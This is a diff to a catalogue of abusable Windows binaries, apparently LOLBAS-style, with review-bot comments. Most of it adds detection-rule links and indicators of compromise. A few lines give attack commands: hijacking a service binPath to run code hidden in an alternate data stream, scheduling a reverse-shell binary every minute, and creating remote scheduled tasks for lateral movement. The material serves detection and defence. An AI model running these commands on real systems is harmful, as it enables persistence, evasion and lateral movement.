- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
||||||
|
@ -17,7 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- IOC: Register-cimprovider.exe execution and cmdline DLL load may be supsicious
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
|
- Link: https://twitter.com/PhilipTsukerman/status/992021361106268161
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
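Review bot: typo in the new IOC line: `supsicious` should be `suspicious`. While here, `cmdline DLL load` reads better spelled out as `command-line DLL load`.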
@ -24,7 +24,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a04fbe2a99f1dcbbfeb0ee4957ae4b06b0866254/rules/windows/process_creation/win_possible_applocker_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/bee2a4cefa533f286c546cbe6798a0b5dec3e5ef/detections/endpoint/detect_regsvcs_with_network_connection.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
- Link: https://pentestlab.blog/2017/05/19/applocker-bypass-regasm-and-regsvcs/
|
||||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
|
@ -38,8 +38,18 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: regsvr32.exe getting files from Internet
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6fbce11094285e5ba13fe101b9cb70f5b1ece198/rules/windows/process_creation/win_susp_regsvr32_anomalies.yml
|
||||||
- IOC: regsvr32.exe executing scriptlet files
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d56e400d209daa77a7900d950a7c587dc0cd2e5/rules/windows/network_connection/sysmon_regsvr32_network_activity.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/5951ad1d9a781a49d61df9af03c7b83ac67a0012/rules/windows/dns_query/dns_query_regsvr32_network_activity.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_regsvr32_flags_anomaly.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/86a5b644a44240f01274c8b74d19a435c7dae66e/detections/endpoint/detect_regsvr32_application_control_bypass.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/execution_register_server_program_connecting_to_the_internet.toml
|
||||||
|
- IOC: regsvr32.exe retrieving files from Internet
|
||||||
|
- IOC: regsvr32.exe executing scriptlet (sct) files
|
||||||
|
- IOC: DotNet CLR libraries loaded into regsvr32.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - regsvr32.exe.log
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
|
- Link: https://pentestlab.blog/2017/05/11/applocker-bypass-regsvr32/
|
||||||
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
- Link: https://oddvar.moe/2017/12/13/applocker-case-study-how-insecure-is-it-really-part-1/
|
||||||
|
@ -24,7 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Replace.exe getting files from remote server
|
- IOC: Replace.exe retrieving files from remote server
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/elceef/status/986334113941655553
|
- Link: https://twitter.com/elceef/status/986334113941655553
|
||||||
- Link: https://twitter.com/elceef/status/986842299861782529
|
- Link: https://twitter.com/elceef/status/986842299861782529
|
||||||
|
@ -24,7 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rpcping.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://github.com/vysec/RedTips
|
- Link: https://github.com/vysec/RedTips
|
||||||
- Link: https://twitter.com/vysecurity/status/974806438316072960
|
- Link: https://twitter.com/vysecurity/status/974806438316072960
|
||||||
|
@ -66,7 +66,11 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/network_connection/sysmon_rundll32_net_connections.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_rundll32_activity.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/12577f7380f324fcee06dab3218582f4a11833e7/rules/windows/defense_evasion_unusual_network_connection_via_rundll32.toml
|
||||||
|
- IOC: Outbount Internet/network connections made from rundll32
|
||||||
|
- IOC: Suspicious use of cmdline flags such as -sta
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
|
- Link: https://pentestlab.blog/2017/05/23/applocker-bypass-rundll32/
|
||||||
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
|
- Link: https://evi1cg.me/archives/AppLocker_Bypass_Techniques.html#menu_index_7
|
||||||
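Review bot: typo in the added IOC line: `Outbount` should be `Outbound`. Otherwise the hunk is sound: the empty `- IOC:` placeholder is replaced rather than left dangling, and the network-connection IOC is backed by both the `sysmon_rundll32_net_connections.yml` Sigma rule and the Elastic `defense_evasion_unusual_network_connection_via_rundll32.toml` rule listed above it.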
@ -75,6 +79,7 @@ Resources:
|
|||||||
- Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
|
- Link: https://bohops.com/2018/06/28/abusing-com-registry-structure-clsid-localserver32-inprocserver32/
|
||||||
- Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
|
- Link: https://github.com/sailay1996/expl-bin/blob/master/obfus.md
|
||||||
- Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
|
- Link: https://github.com/sailay1996/misc-bin/blob/master/rundll32.md
|
||||||
|
- Link: https://nasbench.medium.com/a-deep-dive-into-rundll32-exe-642344b41e90
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Casey Smith
|
- Person: Casey Smith
|
||||||
Handle: '@subtee'
|
Handle: '@subtee'
|
||||||
|
@ -17,7 +17,10 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/6d2acb166070541925636d1d1273e46020e38387/rules/windows/registry_event/sysmon_runonce_persistence.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_runonce_execution.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/2926e98c5d998706ef7e248a63fb0367c841f685/rules/windows/persistence_run_key_and_startup_broad.toml
|
||||||
|
- IOC: Registy key add - HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components\YOURKEY
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/pabraeken/status/990717080805789697
|
- Link: https://twitter.com/pabraeken/status/990717080805789697
|
||||||
- Link: https://cmatskas.com/configure-a-runonce-task-on-windows/
|
- Link: https://cmatskas.com/configure-a-runonce-task-on-windows/
|
||||||
|
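Review bot: typo in the new IOC line: `Registy key add` should be `Registry key add`. The `YOURKEY` placeholder is carried over from the original line, but since the linked Elastic rule is `persistence_run_key_and_startup_broad.toml`, the IOC reads better as a generic indicator (a new subkey created under `HKLM\SOFTWARE\Microsoft\Active Setup\Installed Components`) rather than a literal key name.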
@ -17,6 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_runscripthelper.yml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: Event 4014 - Powershell logging
|
- IOC: Event 4014 - Powershell logging
|
||||||
- IOC: Event 400
|
- IOC: Event 400
|
||||||
Resources:
|
Resources:
|
||||||
|
@ -11,13 +11,26 @@ Commands:
|
|||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1564.004
|
MitreID: T1564.004
|
||||||
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
|
- Command: sc config <existing> binPath="\"c:\\ADS\\file.txt:cmd.exe\" /c echo works > \"c:\ADS\works.txt\"" & sc start <existing>
|
||||||
|
Description: Modifies an existing service and executes the file stored in the ADS.
|
||||||
|
Usecase: Execute binary file hidden inside an alternate data stream
|
||||||
|
Category: ADS
|
||||||
|
Privileges: User
|
||||||
|
MitreID: T1564.004
|
||||||
|
OperatingSystem: Windows vista, Windows 7, Windows 8, Windows 8.1, Windows 10
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\sc.exe
|
- Path: C:\Windows\System32\sc.exe
|
||||||
- Path: C:\Windows\SysWOW64\sc.exe
|
- Path: C:\Windows\SysWOW64\sc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Services that gets created
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_new_service_creation.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_using_sc_to_change_sevice_image_path_by_non_admin.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_susp_service_path_modification.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/sc_exe_manipulating_windows_services.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/lateral_movement_cmd_service.toml
|
||||||
|
- IOC: Unexpected service creation
|
||||||
|
- IOC: Unexpected service modification
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
- Link: https://oddvar.moe/2018/04/11/putting-data-in-alternate-data-streams-and-how-to-execute-it-part-2/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
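Review bot: the new `sc config <existing> binPath=... & sc start <existing>` command is listed with `Privileges: User`, but changing an existing service's image path requires SERVICE_CHANGE_CONFIG on that service, which standard users do not hold by default; state Administrator, or qualify in the Description that it only works for services whose DACL grants the caller that right. The linked Sigma rule `win_using_sc_to_change_sevice_image_path_by_non_admin.yml` exists precisely for that edge case, which is a good reason to mention it. Minor: `Windows vista` (lowercase) appears in both the existing and the new OperatingSystem line.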
@ -6,18 +6,28 @@ Created: 2018-05-25
|
|||||||
Commands:
|
Commands:
|
||||||
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
- Command: schtasks /create /sc minute /mo 1 /tn "Reverse shell" /tr c:\some\directory\revshell.exe
|
||||||
Description: Create a recurring task to execute every minute.
|
Description: Create a recurring task to execute every minute.
|
||||||
Usecase: Create a recurring task, to eg. to keep reverse shell session(s) alive
|
Usecase: Create a recurring task to keep reverse shell session(s) alive
|
||||||
Category: Execute
|
Category: Execute
|
||||||
Privileges: User
|
Privileges: User
|
||||||
MitreID: T1053.005
|
MitreID: T1053.005
|
||||||
OperatingSystem: Windows
|
OperatingSystem: Windows
|
||||||
|
- Command: schtasks /create /s targetmachine /tn "MyTask" /tr c:\some\directory\notevil.exe /sc daily
|
||||||
|
Description: Create a scheduled task on a remote computer for persistence/lateral movement
|
||||||
|
Usecase: Create a remote task to run daily relative to the the time of creation
|
||||||
|
Category: Execute
|
||||||
|
Privileges: Administrator
|
||||||
|
MitreID: T1053.005
|
||||||
|
OperatingSystem: Windows
|
||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: c:\windows\system32\schtasks.exe
|
- Path: c:\windows\system32\schtasks.exe
|
||||||
- Path: c:\windows\syswow64\schtasks.exe
|
- Path: c:\windows\syswow64\schtasks.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Services that gets created
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/59000b993d6280d9bf063eefdcdf30ea0e83aa5e/rules/windows/process_creation/win_susp_schtask_creation.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/ef7548f04c4341e0d1a172810330d59453f46a21/rules/windows/persistence_local_scheduled_task_creation.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/18f63553a9dc1a34122fa123deae2b2f9b9ea391/detections/endpoint/schtasks_scheduling_job_on_remote_system.yml
|
||||||
|
- IOC: Suspicious task creation events
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/
|
- Link: https://isc.sans.edu/forums/diary/Adding+Persistence+Via+Scheduled+Tasks/23633/
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
|
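Review bot: duplicated word in the added Usecase: `relative to the the time of creation`. Also, the old IOC `Services that gets created` was a copy-paste from the sc.exe entry and is rightly replaced; the new `Suspicious task creation events` would be more actionable on its own if it named the log source the linked rules key on.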
@ -24,6 +24,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/765acac3742310764495ed5a2006bc0ced5b1a67/rules/windows/process_creation/win_susp_servu_process_pattern.yml
|
||||||
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed
|
- IOC: Scriptrunner.exe should not be in use unless App-v is deployed
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/KyleHanslovan/status/914800377580503040
|
- Link: https://twitter.com/KyleHanslovan/status/914800377580503040
|
||||||
|
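Review bot: the Sigma link added here is `win_susp_servu_process_pattern.yml`, whose name refers to Serv-U process patterns, not ScriptRunner.exe; this looks like the wrong rule was pasted into the Scriptrunner entry. Verify that the rule's content actually targets ScriptRunner (the IOC below says it should not run unless App-V is deployed) and swap in the correct rule or drop the link.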
@ -22,6 +22,7 @@ Full_Path:
|
|||||||
- Path: C:\Windows\System32\SettingSyncHost.exe
|
- Path: C:\Windows\System32\SettingSyncHost.exe
|
||||||
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe
|
- Path: C:\Windows\SysWOW64\SettingSyncHost.exe
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_using_settingsynchost_as_lolbin.yml
|
||||||
- IOC: SettingSyncHost.exe should not be run on a normal workstation
|
- IOC: SettingSyncHost.exe should not be run on a normal workstation
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/
|
- Link: https://www.hexacorn.com/blog/2020/02/02/settingsynchost-exe-as-a-lolbin/
|
||||||
|
@ -15,6 +15,7 @@ Full_Path:
|
|||||||
- Path: c:\windows\system32\stordiag.exe
|
- Path: c:\windows\system32\stordiag.exe
|
||||||
- Path: c:\windows\syswow64\stordiag.exe
|
- Path: c:\windows\syswow64\stordiag.exe
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/8b86a79ef0ca2f32c006c327350b76b47b604690/rules/windows/process_creation/process_creation_stordiag_execution.yml
|
||||||
- IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\
|
- IOC: systeminfo.exe, fltmc.exe or schtasks.exe being executed outside of their normal path of c:\windows\system32\ or c:\windows\syswow64\
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/eral4m/status/1451112385041911809
|
- Link: https://twitter.com/eral4m/status/1451112385041911809
|
||||||
|
@ -17,6 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/powershell_syncappvpublishingserver_exe.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/fb750721b25ec4573acc32a0822d047a8ecdf269/rules/windows/deprecated/process_creation_syncappvpublishingserver_exe.yml
|
||||||
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
|
- IOC: SyncAppvPublishingServer.exe should never be in use unless App-V is deployed
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/monoxgas/status/895045566090010624
|
- Link: https://twitter.com/monoxgas/status/895045566090010624
|
||||||
|
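Review bot: both Sigma links for SyncAppvPublishingServer point into `rules/windows/deprecated/`, so a reader following them lands on rules SigmaHQ no longer maintains. If current replacements exist under `process_creation` or `powershell`, link those instead; otherwise mark the two entries as deprecated beside the link so nobody deploys them as-is.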
@ -24,6 +24,9 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/5951ad1d9a781a49d61df9af03c7b83ac67a0012/rules/windows/image_load/process_creation_tttracer_mod_load.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/5951ad1d9a781a49d61df9af03c7b83ac67a0012/rules/windows/image_load/sysmon_tttracer_mod_load.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/5bdf70e72c6cd4547624c521108189af994af449/rules/windows/credential_access_cmdline_dump_tool.toml
|
||||||
- IOC: Parent child relationship. Tttracer parent for executed command
|
- IOC: Parent child relationship. Tttracer parent for executed command
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/oulusoyum/status/1191329746069655553
|
- Link: https://twitter.com/oulusoyum/status/1191329746069655553
|
||||||
|
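Review bot: the two Sigma links (`process_creation_tttracer_mod_load.yml` and `sysmon_tttracer_mod_load.yml`, both under `rules/windows/image_load/` at the same pinned commit) appear to be the same rule under its old and new file names; keep one unless their logic actually differs.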
@ -23,6 +23,9 @@ Full_Path:
|
|||||||
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
|
- Path: C:\Windows\Microsoft.NET\Framework64\v3.5\vbc.exe
|
||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_visual_basic_compiler.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_dotnet_compiler_parent_process.toml
|
||||||
Acknowledgement:
|
Acknowledgement:
|
||||||
- Person: Lior Adar
|
- Person: Lior Adar
|
||||||
Handle:
|
Handle:
|
||||||
|
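Review bot: the new Detection block for vbc is inserted directly before Acknowledgement, and no Resources section appears in the visible context; the template orders Detection, Resources, Acknowledgement, so if the entry has none, add one. The `Handle:` left empty under Lior Adar is pre-existing but worth filling or removing while the file is being edited.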
@ -17,7 +17,8 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC:
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_verclsid_runs_com.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/verclsid_clsid_execution.yml
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
|
- Link: https://gist.github.com/NickTyrer/0598b60112eaafe6d07789f7964290d5
|
||||||
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
- Link: https://bohops.com/2018/08/18/abusing-the-com-registry-structure-part-2-loading-techniques-for-evasion-and-persistence/
|
||||||
|
@ -17,6 +17,7 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/a80c29a7c2e2e500a1a532db2a2a8bd69bd4a63d/rules/windows/registry_event/sysmon_wab_dllpath_reg_change.yml
|
||||||
- IOC: WAB.exe should normally never be used
|
- IOC: WAB.exe should normally never be used
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://twitter.com/Hexacorn/status/991447379864932352
|
- Link: https://twitter.com/Hexacorn/status/991447379864932352
|
||||||
|
@ -66,7 +66,21 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
- IOC: Wmic getting scripts from remote system
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/8beb70e970b814d0ab60625206ea0d8a21a9bff8/rules/windows/image_load/sysmon_wmic_remote_xsl_scripting_dlls.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/ff0f1a0222b5100120ae3e43df18593f904c69c0/rules/windows/process_creation/win_xsl_script_processing.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_bypass_squiblytwo.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/c90e31275d2f98b21e55df8a46d0678cfca458d6/rules/windows/process_creation/win_susp_wmic_eventconsumer_create.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/414d32027632a49fb239abb8fbbb55d3fa8dd861/rules/windows/defense_evasion_suspicious_wmi_script.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/persistence_via_windows_management_instrumentation_event_subscription.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/961a81d4a5cb5c5febec4894d6d812497171a85c/detections/endpoint/xsl_script_execution_with_wmic.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_wmi_command_attempt.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/3f77e24974239fcb7a339080a1a483e6bad84a82/detections/endpoint/remote_process_instantiation_via_wmi.yml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/08ed88bd88259c03c771c30170d2934ed0a8f878/detections/endpoint/process_execution_via_wmi.yml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
|
- IOC: Wmic retrieving scripts from remote system/Internet location
|
||||||
|
- IOC: DotNet CLR libraries loaded into wmic.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - wmic.exe.log
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
|
- Link: https://stackoverflow.com/questions/24658745/wmic-how-to-use-process-call-create-with-a-specific-working-directory
|
||||||
- Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
|
- Link: https://subt0x11.blogspot.no/2018/04/wmicexe-whitelisting-bypass-hacking.html
|
||||||
|
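Review bot: several of the rule links added under Detection in this hunk cover wmic abuses other than the remote script retrieval the entry documents: win_susp_wmic_eventconsumer_create.yml and persistence_via_windows_management_instrumentation_event_subscription.toml target WMI event-subscription persistence, and remote_wmi_command_attempt.yml / remote_process_instantiation_via_wmi.yml target remote process creation over WMI. Either trim the list to the rules that match the XSL/script IOCs (sysmon_wmic_remote_xsl_scripting_dlls.yml, win_xsl_script_processing.yml, win_bypass_squiblytwo.yml, xsl_script_execution_with_wmic.yml) or keep the extra rules and add one IOC line per behaviour they detect, so a reader knows why each is listed. The reworded IOC "Wmic retrieving scripts from remote system/Internet location" reads fine, and the two DotNet CLR IOCs pair with defense_evasion_suspicious_managedcode_host_process.toml.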
@ -14,6 +14,7 @@ Commands:
|
|||||||
Full_Path:
|
Full_Path:
|
||||||
- Path: C:\Windows\System32\WorkFolders.exe
|
- Path: C:\Windows\System32\WorkFolders.exe
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/b4d5b44ea86cda24f38a87d3b0c5f9d4455bf841/rules/windows/process_creation/win_susp_workfolders.yml
|
||||||
- IOC: WorkFolders.exe should not be run on a normal workstation
|
- IOC: WorkFolders.exe should not be run on a normal workstation
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://www.ctus.io/2021/04/12/exploading/
|
- Link: https://www.ctus.io/2021/04/12/exploading/
|
||||||
|
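Review bot: the retained IOC "WorkFolders.exe should not be run on a normal workstation" is a policy statement rather than an observable; rephrase it as the event to alert on, e.g. "WorkFolders.exe process creation on hosts that do not use Work Folders", and leave the concrete matching to the win_susp_workfolders.yml Sigma link added above it.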
@ -24,7 +24,17 @@ Full_Path:
|
|||||||
Code_Sample:
|
Code_Sample:
|
||||||
- Code:
|
- Code:
|
||||||
Detection:
|
Detection:
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/process_creation/win_susp_script_execution.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/file_event/sysmon_susp_clr_logs.yml
|
||||||
|
- Sigma: https://github.com/SigmaHQ/sigma/blob/08ca62cc8860f4660e945805d0dd615ce75258c1/rules/windows/image_load/sysmon_susp_script_dotnet_clr_dll_load.yml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/61afb1c1c0c3f50637b1bb194f3e6fb09f476e50/rules/windows/defense_evasion_unusual_dir_ads.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/cc241c0b5ec590d76cb88ec638d3cc37f68b5d50/rules/windows/command_and_control_remote_file_copy_scripts.toml
|
||||||
|
- Elastic: https://github.com/elastic/detection-rules/blob/82ec6ac1eeb62a1383792719a1943b551264ed16/rules/windows/defense_evasion_suspicious_managedcode_host_process.toml
|
||||||
|
- Splunk: https://github.com/splunk/security_content/blob/a1afa0fa605639cbef7d528dec46ce7c8112194a/detections/endpoint/wscript_or_cscript_suspicious_child_process.yml
|
||||||
|
- BlockRule: https://docs.microsoft.com/en-us/windows/security/threat-protection/windows-defender-application-control/microsoft-recommended-block-rules
|
||||||
- IOC: Wscript.exe executing code from alternate data streams
|
- IOC: Wscript.exe executing code from alternate data streams
|
||||||
|
- IOC: DotNet CLR libraries loaded into wscript.exe
|
||||||
|
- IOC: DotNet CLR Usage Log - wscript.exe.log
|
||||||
Resources:
|
Resources:
|
||||||
- Link: https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f
|
